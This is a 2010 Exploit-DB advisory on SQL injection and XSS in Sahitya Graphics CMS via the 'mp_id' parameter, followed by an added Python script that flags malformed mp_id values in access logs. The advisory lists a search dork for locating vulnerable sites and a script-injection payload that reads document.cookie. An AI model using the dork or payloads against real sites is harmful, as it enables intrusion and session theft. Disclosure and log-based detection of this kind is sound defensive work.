sahitya graphics CMS – Multiple Vulnerabilities

  • Author: Dr.0rYX & Cr3W-DZ
    Date: 2010-11-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15592/
  •  
     Exploit Title: Sahitya Graphics CMS Multiple Remote Vulnerabilities
     Date: 12.10.2010
     Author: Dr.0rYX and Cr3w-DZ
     Category: webapps/0day
    
    *********************************- NORTH-AFRICA SECURITY TEAM -*************************************
     
    [!]Sahitya Graphics CMS Multiple Remote Vulnerabilities 
    [!] Author: Dr.0rYX and Cr3w-DZ
    [!] MAIL: sniper-dz@hotmail.de & Cr3w@hotmail.de
     
    ***************************************************************************/
    [!] notice :
     Dr.0rYX: MY OLD EMAIL VX3@HOTMAIL.DE CLOSED
     MY NEW EMAIL IS SNIPER-DZ@HOTMAIL.DE
    
    ***************************************************************************/
    [ Software Information ]
     
    [+] Vendor : http://www.sahityagraphics.com.au/
    [+] script : Sahitya Graphics CMS
    [+] Download : http://www.sahityagraphics.com.au/overview.html (sell script )
    [+] Vulnerability : BLIND SQL injection Vulnerability / XSS Vulnerability
    [+] Dork : inurl:"index.php?mp_id=" Sahitya
     
    **************************************************************************/
    [ Vulnerable File 1]
     
    http://server/index.php?mp_id=sql[N.A.S.T ]
    
    [ Exploit 1 ]
     
    http://server/index.php?mp_id=1 BLIND SQL INJECTION 
    
    
    *************************************************************************/
    [ Vulnerable File 2]
    
    http://server/index.php?mp_id=xss[N.A.S.T ]
    
    [ Exploit 2 ]
    http://www.server/index.php?mp_id='><script>alert(document.cookie)</script>
    
    [GReet ]
     
    [+] : Exploit-db.com , all hackers muslims
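
Both issues above arrive through the same `mp_id` query parameter, so one check on web-server logs covers them. The following is an added example, not part of the original advisory or the vendor's code: it flags every request to `index.php` whose `mp_id` is not a plain integer. It assumes `mp_id` is a numeric page id (the advisory only shows `mp_id=1`); the log lines, client addresses and the function name `suspicious_mp_id` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
# The second line carries the payload quoted in the advisory, URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Nov/2010:10:00:01 +0000] "GET /index.php?mp_id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Nov/2010:10:00:07 +0000] "GET /index.php?mp_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5301
203.0.113.9 - - [21/Nov/2010:10:00:09 +0000] "GET /index.php?mp_id=7abc HTTP/1.1" 200 4988
203.0.113.7 - - [21/Nov/2010:10:00:12 +0000] "GET /index.php?mp_id=3&mp_id=x HTTP/1.1" 200 5120
203.0.113.7 - - [21/Nov/2010:10:00:15 +0000] "GET /about.html HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate mp_id is a short run of ASCII digits and nothing else.
INTEGER_RE = re.compile(r"[0-9]{1,10}")


def suspicious_mp_id(log_text):
    """Return (client_ip, decoded_value) for every non-integer mp_id seen."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/index.php"):
            continue
        # parse_qs URL-decodes and keeps repeated parameters, so a clean first
        # value cannot hide a second, malformed one.
        values = parse_qs(parts.query, keep_blank_values=True).get("mp_id", [])
        for value in values:
            if not INTEGER_RE.fullmatch(value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_mp_id(SAMPLE_LOG):
        print(f"{ip}\tmp_id={value!r}")
```

The same integer-only rule, applied in the application before `mp_id` reaches a query or the page output, rejects both request shapes shown in the advisory.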